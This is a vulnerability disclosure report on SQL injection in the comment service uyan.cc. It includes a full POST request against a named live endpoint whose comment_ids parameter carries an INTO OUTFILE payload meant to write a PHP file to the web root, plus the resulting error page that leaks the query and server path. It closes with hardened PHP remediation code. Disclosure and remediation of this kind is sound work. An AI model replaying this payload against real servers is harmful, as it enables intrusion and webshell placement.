Brief description:
http://uyan.cc is a newly founded community-comment startup; lax filtering of SQL input leaves it open to SQL injection.
Detailed description:
The endpoint http://uyan.cc/index.php/youyan_content/getRepliesTogether/time does not filter the POST data. At the same time, http://uyan.cc/index.php/youyan?title=%E5%9B%BD%E5%86%E4%BA%E5%852%9B%E4%B8% leaks the server-side file path through its error page.
However, because the database server is separate from the web server, writing a webshell with INTO OUTFILE is not directly feasible.
Proof of vulnerability:
POST http://uyan.cc/index.php/youyan_content/getRepliesTogether/time HTTP/1.1
Host: uyan.cc
Connection: keep-alive
Content-Length: 723
Origin: http://uyan.cc
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Referer: http://uyan.cc/index.php/youyan?pageId=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&domain=www.36kr.coma'%20&%20'1'='2&master_id=2711%20&%201=2&title='''-1&url=-1&pageImg=;%3C/javascript%3E&pageContent=-1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6
Accept-Charset: GBK,UTF-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=97ipt9bjm2otbd7j2cphg84444

comment_ids%5B%5D=168019&comment_ids%5B%5D=168031 and (select '000000' into outfile '//opt//lampstack-5.3.6-0//apache2//htdocs//controllers//1ssbbb.php')=1&comment_ids%5B%5D=168020&comment_ids%5B%5D=168032&comment_ids%5B%5D=168007&comment_ids%5B%5D=168006&comment_ids%5B%5D=167967&comment_ids%5B%5D=167985&comment_ids%5B%5D=167986&comment_ids%5B%5D=167987&page=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&delStyle=0&found%5B167967%5D=0&reply_page_no%5B167985%5D=0&found%5B167986%5D=0&found%5B167987%5D=0&reply_page_no%5B168006%5D=0&found%5B168007%5D=0&reply_page_no%5B168019%5D=0&found%5B168020%5D=0&found%5B168031%5D=0&reply_page_no%5B168032%5D=0&session_name=uyan_www.36kr.com
<body>
<div id="content">
<h1>A Database Error Occurred</h1>
<p>Error Number: 1064</p>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1 = 1 order by comment.time desc limit 0, 3' at line 3</p>
<p>select user.*, comment.* from comment
left join user ON user.user_id = comment.user_id
where comment.del = 0 and comment.reply_to_comment_id = 168031 and '1 = 1 order by comment.time desc limit 0, 3</p>
<p>Filename: /opt/lampstack-5.3.6-0/apache2/htdocs/models/comment_model.php</p>
<p>Line Number: 251</p>
</div>
</body>
</html>
Solution:
Filter user-submitted parameters before they reach the query, and suppress detailed database error messages in responses.
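The following is an added example, not uyan.cc's own code, of how the reply lookup shown in the leaked query could be written so that both halves of the fix apply: the comment_ids[] POST array is reduced to plain integers before use, the query binds them as parameters instead of concatenating them into SQL text, and driver errors are logged server-side rather than echoed to the client. The table and column names are taken from the leaked query in the error page; the DSN and credentials are placeholders, and the function names are assumed.

```php
<?php
// Added example (not the site's code): hardened version of the reply lookup
// that the leaked query shows being built from comment_ids[] in the POST body.
// Table/column names come from the error page; DSN and credentials are placeholders.

declare(strict_types=1);

// Never send driver error text to the client: log it, return a generic message.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Reduce an untrusted $_POST['comment_ids'] value to a list of positive integers.
 * Anything that is not a plain decimal number is rejected outright, so a value
 * such as "168031 and (select ...)" never reaches the query.
 */
function sanitizeCommentIds($raw): array
{
    if (!is_array($raw)) {
        return [];
    }
    $ids = [];
    foreach ($raw as $value) {
        // ctype_digit accepts only strings made of 0-9; leading zeros are rejected too
        if (is_string($value) && ctype_digit($value) && $value[0] !== '0') {
            $ids[] = (int) $value;
        }
    }
    return array_values(array_unique($ids));
}

/**
 * Fetch the latest $limit replies for one comment with a prepared statement.
 * The ID and LIMIT travel as typed bound parameters, never as SQL text.
 */
function fetchReplies(PDO $db, int $commentId, int $limit = 3): array
{
    $sql = 'SELECT user.*, comment.* FROM comment '
         . 'LEFT JOIN user ON user.user_id = comment.user_id '
         . 'WHERE comment.del = 0 AND comment.reply_to_comment_id = :id '
         . 'ORDER BY comment.time DESC LIMIT :lim';
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':id', $commentId, PDO::PARAM_INT);
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Request handling; connection values below are placeholders.
try {
    $db = new PDO(
        'mysql:host=DB_HOST_PLACEHOLDER;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
        'DB_USER_PLACEHOLDER',
        'DB_PASS_PLACEHOLDER',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            // Native prepares keep values and SQL separate on the wire.
            PDO::ATTR_EMULATE_PREPARES => false,
        ]
    );

    $result = [];
    foreach (sanitizeCommentIds($_POST['comment_ids'] ?? null) as $id) {
        $result[$id] = fetchReplies($db, $id);
    }

    header('Content-Type: application/json');
    echo json_encode($result);
} catch (PDOException $e) {
    // Real error goes to the server log; the client sees only a generic status,
    // so neither the SQL text nor the file path is disclosed.
    error_log('getRepliesTogether DB error: ' . $e->getMessage());
    http_response_code(500);
    header('Content-Type: application/json');
    echo json_encode(['error' => 'internal error']);
}
```

With this shape, a request body like the one in the proof above yields an empty or partial ID list rather than an altered query, and a genuine database failure produces a logged entry plus a bare 500 response instead of the stack-revealing page shown above.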
Author: cr0_3